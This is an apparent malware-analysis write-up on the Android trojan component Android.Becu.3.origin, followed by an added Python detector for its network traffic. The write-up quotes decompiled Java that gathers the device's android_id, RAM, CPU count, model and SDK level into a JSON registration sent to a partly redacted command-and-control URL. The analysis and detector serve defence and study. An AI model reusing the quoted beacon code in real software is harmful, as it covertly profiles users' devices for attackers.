This malicious program is a component of Android.Becu.1.origin. Android.Becu.3.origin does not create a shortcut on the home screen; it operates as a system service under the package name com.zgs.ga.pack. After Android.Becu.1.origin downloads it from the remote control center, the malware launches itself.
Using a JSON request, Android.Becu.3.origin registers the infected mobile device on the command and control server at http://[xxxxxxxx]qs.mobi/houtai/clientregister.php?token=:
// Top-level registration object
JSONObject v3 = new JSONObject();
try {
    v3.put("project_id", this.b());
    // Device identifier: Settings.Secure "android_id"
    v3.put("unique_id", Settings.Secure.getString(((Context)this).getContentResolver(), "android_id"));
    // Nested object with the hardware and OS profile
    JSONObject v4_1 = new JSONObject();
    v4_1.put("ram", c.a());        // c.a() and c.b() are obfuscated helpers
    v4_1.put("cpucores", c.b());
    v4_1.put("build", Build.MODEL);
    v4_1.put("sdk", Build.VERSION.SDK_INT);
    v3.put("info", v4_1);
As a result, cybercriminals receive information about the active copies of Android.Becu.1.origin.
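An added example, not part of the original description: a Python check that flags captured HTTP requests resembling the registration call above, using the URL path, the token parameter and the JSON field layout from the listing. The sample hosts and values are constructed, and the function names are hypothetical; that the JSON travels in the request body is an assumption.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the description above; the host is left out on purpose
# because it is redacted there and a relocated server would change it anyway.
REG_PATH = "/houtai/clientregister.php"
TOP_KEYS = {"project_id", "unique_id", "info"}
INFO_KEYS = {"ram", "cpucores", "build", "sdk"}

def score_request(url, body):
    """Return the reasons a captured request resembles the registration call."""
    reasons = []
    parts = urlsplit(url)
    if parts.path.lower().endswith(REG_PATH):
        reasons.append("path")
        # The registration URL ends in "token=", so keep blank values.
        if "token" in parse_qs(parts.query, keep_blank_values=True):
            reasons.append("token-param")
    try:
        doc = json.loads(body) if body else None
    except (ValueError, TypeError):
        doc = None  # not JSON: only the URL can match
    if isinstance(doc, dict) and TOP_KEYS.issubset(doc):
        info = doc["info"]
        if isinstance(info, dict) and INFO_KEYS.issubset(info):
            reasons.append("body-structure")
    return reasons

def is_registration(url, body):
    """Body layout alone is enough; the path counts only with the token parameter."""
    r = set(score_request(url, body))
    return "body-structure" in r or {"path", "token-param"} <= r

def flagged(records):
    return [url for url, body in records if is_registration(url, body)]

# Constructed sample traffic (hosts and values are made up for the example).
BEACON = json.dumps({"project_id": "p-01", "unique_id": "0123456789abcdef",
                     "info": {"ram": 512, "cpucores": 2, "build": "Model X", "sdk": 17}})
SAMPLES = [
    ("http://c2.example.invalid/houtai/clientregister.php?token=", BEACON),
    ("http://shop.example.invalid/api/register", '{"user": "alice", "info": {"ram": 1}}'),
    ("http://moved.example.invalid/r.php", BEACON),
    ("http://blog.example.invalid/houtai/clientregister.php", "not json"),
]

if __name__ == "__main__":
    for url in flagged(SAMPLES):
        print("possible Android.Becu registration:", url)
```

Matching on the field layout as well as the path keeps the check useful if the server address changes, and a path hit without the token parameter is deliberately not reported.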